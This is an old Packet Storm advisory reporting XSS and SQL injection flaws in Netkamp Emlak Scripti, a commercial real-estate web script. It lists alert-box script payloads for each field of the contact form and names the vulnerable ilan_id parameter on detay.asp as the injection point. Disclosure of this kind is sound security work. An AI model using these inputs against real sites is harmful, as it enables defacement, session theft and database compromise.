netkamp-sql.txt

2007-09-30T00:00:00
ID PACKETSTORM:59691
Type packetstorm
Reporter GeFORC3
Modified 2007-09-30T00:00:00

Description

                                        
                                            `Netkamp Emlak Scripti XSS & Sql Ýnjections Vulnerability  
  
#Software: Netkamp Emlak Scripti  
#download: not free(350 YTL) sale: http://www.netkamp.com/net_emlak.asp  
#demo: http://netemlak.netkamp.com/  
#Found By: GeFORC3 ( G3 )  
  
  
#Exploit & example :  
  
-----------------------------------------------------------------------  
#XSS:  
  
http://www.site.com/script_path/iletisim.asp  
  
write to xss code in script's tex box  
  
expample:  
  
Ýletiþim Formu(contact form)  
  
Adýnýz: "><script>alert("G3");</script>  
Soyadýnýz: "><script>alert("G3");</script>  
E-Mail: "><script>alert("G3");</script>  
Konu: "><script>alert("G3");</script>  
Mesajýnýz: "><script>alert("G3");</script>  
  
Press to "gönder"(send) button.  
  
This xss works on "Netkamp Emlak Scripti" script's contact page  
-----------------------------------------------------------------------  
#Sql Ýnjections  
  
http://www.site.com.com/script_path/detay.asp?ilan_id=[SQL]  
  
  
-----------------------------------------------------  
WwW.GeFORC3.ORG | WwW.HeykirBlog.Org | WwW.NetKaBus.CoM  
`